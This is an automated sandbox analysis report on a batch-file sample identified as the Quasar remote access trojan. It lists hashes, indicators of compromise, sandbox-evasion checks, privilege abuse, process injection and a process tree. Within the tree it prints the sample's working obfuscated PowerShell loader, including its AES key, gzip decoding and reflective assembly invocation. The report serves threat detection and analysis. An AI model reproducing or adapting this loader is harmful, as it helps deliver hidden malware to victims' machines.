Analysis
-
max time kernel
150s -
max time network
149s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
28-01-2025 06:24
Static task
static1
Behavioral task
behavioral1
Sample
69e99e962f784f1d4ac17447a74741ff7da3efe70522df9a7bc070b431e4bec0.bat
Resource
win7-20241023-en
General
-
Target
69e99e962f784f1d4ac17447a74741ff7da3efe70522df9a7bc070b431e4bec0.bat
-
Size
3.5MB
-
MD5
baea34214aa1a2aa90de5d0b3d841882
-
SHA1
5206d25733b9fcf0c4b52fb3002b8f5def87699d
-
SHA256
69e99e962f784f1d4ac17447a74741ff7da3efe70522df9a7bc070b431e4bec0
-
SHA512
7e906e15de93a06eb763d069ea07ca763e4e0fe0d8cb3a804aded05ac5063d65ef09fa2d130abce268d1c3fcee96b28701f6d1b9a612bd1b1dbcd0f0b53a5d3d
-
SSDEEP
49152:a066fNaUEnvOthWSIdX+H3bjAq+hbPVjS:n
Malware Config
Extracted
quasar
-
reconnect_delay
3000
Signatures
-
Quasar family
-
Quasar payload 1 IoCs
resource yara_rule behavioral2/memory/5004-62-0x000001EBD32A0000-0x000001EBD3808000-memory.dmp family_quasar -
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 3224 created 616 3224 powershell.EXE 5 -
Blocklisted process makes network request 6 IoCs
flow pid Process 23 5004 powershell.exe 37 5004 powershell.exe 40 5004 powershell.exe 47 5004 powershell.exe 48 5004 powershell.exe 50 5004 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell and hide display window.
pid Process 4452 powershell.exe 3964 powershell.exe 5004 powershell.exe 3224 powershell.EXE -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion wmiprvse.exe -
Drops file in System32 directory 10 IoCs
description ioc Process File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776 svchost.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml OfficeClickToRun.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 1284 set thread context of 1328 1284 powershell.exe 106 PID 3224 set thread context of 2248 3224 powershell.EXE 109 -
Drops file in Windows directory 3 IoCs
description ioc Process File opened for modification C:\Windows\$nya-onimai3 powershell.exe File created C:\Windows\$nya-onimai3\$nya-Loli.bat powershell.exe File opened for modification C:\Windows\$nya-onimai3\$nya-Loli.bat powershell.exe -
System Location Discovery: System Language Discovery 1 TTPs 2 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
Checks SCSI registry key(s) 3 TTPs 18 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Mfg wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\DeviceDesc wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Service wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\DeviceDesc wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000\LogConf wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\CompatibleIDs wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Mfg wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000\LogConf wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\CompatibleIDs wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Service wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags wmiprvse.exe -
Enumerates system info in registry 2 TTPs 1 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier wmiprvse.exe -
Modifies data under HKEY_USERS 55 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Tue, 28 Jan 2025 06:26:21 GMT" OfficeClickToRun.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.EXE Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={028F791C-9EDF-47B3-B697-8CBCC2DA956D}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&" OfficeClickToRun.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1738045580" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1604 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4452 powershell.exe 4452 powershell.exe 3964 powershell.exe 3964 powershell.exe 4744 powershell.exe 4744 powershell.exe 5004 powershell.exe 5004 powershell.exe 5004 powershell.exe 5004 powershell.exe 3224 powershell.EXE 3224 powershell.EXE 3224 powershell.EXE 2248 dllhost.exe 2248 dllhost.exe 2248 dllhost.exe 2248 dllhost.exe 2248 dllhost.exe 2248 dllhost.exe 2248 dllhost.exe 2248 dllhost.exe 2248 dllhost.exe 2248 dllhost.exe 2248 dllhost.exe 2248 dllhost.exe 2248 dllhost.exe 2248 dllhost.exe 2248 dllhost.exe 2248 dllhost.exe 2248 dllhost.exe 2248 dllhost.exe 2248 dllhost.exe 2248 dllhost.exe 2248 dllhost.exe 2248 dllhost.exe 2248 dllhost.exe 2248 dllhost.exe 2248 dllhost.exe 2248 dllhost.exe 2248 dllhost.exe 2248 dllhost.exe 2248 dllhost.exe 2248 dllhost.exe 2248 dllhost.exe 2248 dllhost.exe 2248 dllhost.exe 2248 dllhost.exe 5004 powershell.exe 2248 dllhost.exe 2248 dllhost.exe 2248 dllhost.exe 2248 dllhost.exe 2248 dllhost.exe 2248 dllhost.exe 2248 dllhost.exe 2248 dllhost.exe 2248 dllhost.exe 2248 dllhost.exe 5004 powershell.exe 2248 dllhost.exe 2248 dllhost.exe 2248 dllhost.exe 2248 dllhost.exe 2248 dllhost.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 4452 powershell.exe Token: SeDebugPrivilege 3964 powershell.exe Token: SeIncreaseQuotaPrivilege 3964 powershell.exe Token: SeSecurityPrivilege 3964 powershell.exe Token: SeTakeOwnershipPrivilege 3964 powershell.exe Token: SeLoadDriverPrivilege 3964 powershell.exe Token: SeSystemProfilePrivilege 3964 powershell.exe Token: SeSystemtimePrivilege 3964 powershell.exe Token: SeProfSingleProcessPrivilege 3964 powershell.exe Token: SeIncBasePriorityPrivilege 3964 powershell.exe Token: SeCreatePagefilePrivilege 3964 powershell.exe Token: SeBackupPrivilege 3964 powershell.exe Token: SeRestorePrivilege 3964 powershell.exe Token: SeShutdownPrivilege 3964 powershell.exe Token: SeDebugPrivilege 3964 powershell.exe Token: SeSystemEnvironmentPrivilege 3964 powershell.exe Token: SeRemoteShutdownPrivilege 3964 powershell.exe Token: SeUndockPrivilege 3964 powershell.exe Token: SeManageVolumePrivilege 3964 powershell.exe Token: 33 3964 powershell.exe Token: 34 3964 powershell.exe Token: 35 3964 powershell.exe Token: 36 3964 powershell.exe Token: SeIncreaseQuotaPrivilege 3964 powershell.exe Token: SeSecurityPrivilege 3964 powershell.exe Token: SeTakeOwnershipPrivilege 3964 powershell.exe Token: SeLoadDriverPrivilege 3964 powershell.exe Token: SeSystemProfilePrivilege 3964 powershell.exe Token: SeSystemtimePrivilege 3964 powershell.exe Token: SeProfSingleProcessPrivilege 3964 powershell.exe Token: SeIncBasePriorityPrivilege 3964 powershell.exe Token: SeCreatePagefilePrivilege 3964 powershell.exe Token: SeBackupPrivilege 3964 powershell.exe Token: SeRestorePrivilege 3964 powershell.exe Token: SeShutdownPrivilege 3964 powershell.exe Token: SeDebugPrivilege 3964 powershell.exe Token: SeSystemEnvironmentPrivilege 3964 powershell.exe Token: SeRemoteShutdownPrivilege 3964 powershell.exe Token: SeUndockPrivilege 3964 powershell.exe Token: SeManageVolumePrivilege 3964 powershell.exe Token: 33 3964 powershell.exe Token: 34 3964 powershell.exe Token: 35 3964 powershell.exe Token: 36 3964 powershell.exe Token: SeIncreaseQuotaPrivilege 3964 powershell.exe Token: SeSecurityPrivilege 3964 powershell.exe Token: SeTakeOwnershipPrivilege 3964 powershell.exe Token: SeLoadDriverPrivilege 3964 powershell.exe Token: SeSystemProfilePrivilege 3964 powershell.exe Token: SeSystemtimePrivilege 3964 powershell.exe Token: SeProfSingleProcessPrivilege 3964 powershell.exe Token: SeIncBasePriorityPrivilege 3964 powershell.exe Token: SeCreatePagefilePrivilege 3964 powershell.exe Token: SeBackupPrivilege 3964 powershell.exe Token: SeRestorePrivilege 3964 powershell.exe Token: SeShutdownPrivilege 3964 powershell.exe Token: SeDebugPrivilege 3964 powershell.exe Token: SeSystemEnvironmentPrivilege 3964 powershell.exe Token: SeRemoteShutdownPrivilege 3964 powershell.exe Token: SeUndockPrivilege 3964 powershell.exe Token: SeManageVolumePrivilege 3964 powershell.exe Token: 33 3964 powershell.exe Token: 34 3964 powershell.exe Token: 35 3964 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 5004 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4912 wrote to memory of 228 4912 cmd.exe 83 PID 4912 wrote to memory of 228 4912 cmd.exe 83 PID 4912 wrote to memory of 4452 4912 cmd.exe 84 PID 4912 wrote to memory of 4452 4912 cmd.exe 84 PID 4452 wrote to memory of 1604 4452 powershell.exe 90 PID 4452 wrote to memory of 1604 4452 powershell.exe 90 PID 4452 wrote to memory of 3964 4452 powershell.exe 92 PID 4452 wrote to memory of 3964 4452 powershell.exe 92 PID 4452 wrote to memory of 4744 4452 powershell.exe 96 PID 4452 wrote to memory of 4744 4452 powershell.exe 96 PID 2804 wrote to memory of 924 2804 cmd.exe 100 PID 2804 wrote to memory of 924 2804 cmd.exe 100 PID 2804 wrote to memory of 5004 2804 cmd.exe 101 PID 2804 wrote to memory of 5004 2804 cmd.exe 101 PID 5004 wrote to memory of 3948 5004 powershell.exe 102 PID 5004 wrote to memory of 3948 5004 powershell.exe 102 PID 5004 wrote to memory of 1284 5004 powershell.exe 104 PID 5004 wrote to memory of 1284 5004 powershell.exe 104 PID 5004 wrote to memory of 1284 5004 powershell.exe 104 PID 5004 wrote to memory of 1284 5004 powershell.exe 104 PID 1284 wrote to memory of 1328 1284 powershell.exe 106 PID 1284 wrote to memory of 1328 1284 powershell.exe 106 PID 1284 wrote to memory of 1328 1284 powershell.exe 106 PID 1284 wrote to memory of 1328 1284 powershell.exe 106 PID 1284 wrote to memory of 1328 1284 powershell.exe 106 PID 1284 wrote to memory of 1328 1284 powershell.exe 106 PID 1284 wrote to memory of 1328 1284 powershell.exe 106 PID 1284 wrote to memory of 1328 1284 powershell.exe 106 PID 1284 wrote to memory of 1328 1284 powershell.exe 106 PID 3224 wrote to memory of 2248 3224 powershell.EXE 109 PID 3224 wrote to memory of 2248 3224 powershell.EXE 109 PID 3224 wrote to memory of 2248 3224 powershell.EXE 109 PID 3224 wrote to memory of 2248 3224 powershell.EXE 109 PID 3224 wrote to memory of 2248 3224 powershell.EXE 109 PID 3224 wrote to memory of 2248 3224 powershell.EXE 109 PID 3224 wrote to memory of 2248 3224 powershell.EXE 109 PID 3224 wrote to memory of 2248 3224 powershell.EXE 109 PID 2248 wrote to memory of 616 2248 dllhost.exe 5 PID 2248 wrote to memory of 684 2248 dllhost.exe 7 PID 2248 wrote to memory of 964 2248 dllhost.exe 12 PID 2248 wrote to memory of 384 2248 dllhost.exe 13 PID 2248 wrote to memory of 536 2248 dllhost.exe 14 PID 2248 wrote to memory of 928 2248 dllhost.exe 15 PID 2248 wrote to memory of 1096 2248 dllhost.exe 17 PID 2248 wrote to memory of 1108 2248 dllhost.exe 18 PID 2248 wrote to memory of 1124 2248 dllhost.exe 19 PID 2248 wrote to memory of 1208 2248 dllhost.exe 20 PID 2248 wrote to memory of 1276 2248 dllhost.exe 21 PID 2248 wrote to memory of 1352 2248 dllhost.exe 22 PID 2248 wrote to memory of 1364 2248 dllhost.exe 23 PID 2248 wrote to memory of 1400 2248 dllhost.exe 24 PID 2248 wrote to memory of 1472 2248 dllhost.exe 25 PID 2248 wrote to memory of 1588 2248 dllhost.exe 26 PID 2248 wrote to memory of 1596 2248 dllhost.exe 27 PID 2248 wrote to memory of 1652 2248 dllhost.exe 28 PID 2248 wrote to memory of 1756 2248 dllhost.exe 29 PID 2248 wrote to memory of 1764 2248 dllhost.exe 30 PID 2248 wrote to memory of 1796 2248 dllhost.exe 31 PID 2248 wrote to memory of 1848 2248 dllhost.exe 32 PID 2248 wrote to memory of 1904 2248 dllhost.exe 33 PID 2248 wrote to memory of 1916 2248 dllhost.exe 34 PID 2248 wrote to memory of 1980 2248 dllhost.exe 35 PID 2248 wrote to memory of 1016 2248 dllhost.exe 36 PID 2248 wrote to memory of 2100 2248 dllhost.exe 37 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:616
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵PID:384
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{cc37e3b7-d6fc-4122-a8f3-626028b3f11c}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2248
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:684
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:964
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵PID:536
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:928
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:1096
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:1108
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵PID:1124
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵PID:1208
-
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵PID:3084
-
-
C:\Windows\SYSTEM32\cmd.exeC:\Windows\SYSTEM32\cmd.exe /c "C:\Windows\$nya-onimai3\$nya-Loli.bat"2⤵
- Suspicious use of WriteProcessMemory
PID:2804 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:2880
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function pPrLV($xjezz){ $wMHou=[System.Security.Cryptography.Aes]::Create(); $wMHou.Mode=[System.Security.Cryptography.CipherMode]::CBC; $wMHou.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $wMHou.Key=[System.Convert]::FromBase64String('lO1Vwq/nj9Puc/oGonhZjSQq/nzSWIn0lm/0BxXEcbE='); $wMHou.IV=[System.Convert]::FromBase64String('Z8/xZ+jsEzHKXXOs4H9TJQ=='); $LmFjs=$wMHou.CreateDecryptor(); $ZsDwh=$LmFjs.TransformFinalBlock($xjezz, 0, $xjezz.Length); $LmFjs.Dispose(); $wMHou.Dispose(); $ZsDwh;}function gbxhW($xjezz){ IEX '$Ovdns=New-Object System.IO.M*em*or*yS*tr*ea*m(,$xjezz);'.Replace('*', ''); IEX '$pBnCe=New-Object System.IO.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); IEX '$KPnRz=New-Object System.IO.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($Ovdns, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $KPnRz.CopyTo($pBnCe); $KPnRz.Dispose(); $Ovdns.Dispose(); $pBnCe.Dispose(); $pBnCe.ToArray();}function DUZhs($xjezz,$VPKjP){ IEX '$osgqK=[System.R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$xjezz);'.Replace('*', ''); IEX '$vIuGg=$osgqK.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); IEX '$vIuGg.*I*n*v*o*k*e*($null, $VPKjP);'.Replace('*', '');}$IVcAh = 'C:\Windows\$nya-onimai3\$nya-Loli.bat';$host.UI.RawUI.WindowTitle = $IVcAh;$vvRPw=[System.IO.File]::ReadAllText($IVcAh).Split([Environment]::NewLine);foreach ($OSbaK in $vvRPw) { if ($OSbaK.StartsWith(':: ')) { $wgCug=$OSbaK.Substring(3); break; }}$IWIwq=[string[]]$wgCug.Split('\');IEX '$VTaqv=gbxhW (pPrLV ([*C*o*n*v*e*rt]::*F*r*o*m*B*a*se6*4*S*t*ri*n*g*($IWIwq[0])));'.Replace('*', '');IEX '$ZEjBw=gbxhW (pPrLV ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($IWIwq[1])));'.Replace('*', '');DUZhs $VTaqv $null;DUZhs $ZEjBw (,[string[]] ('')); "3⤵PID:924
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -WindowStyle Hidden3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:5004 -
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /Delete /TN "$nya-Loli_1" /F4⤵PID:3948
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"4⤵
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1284 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"5⤵
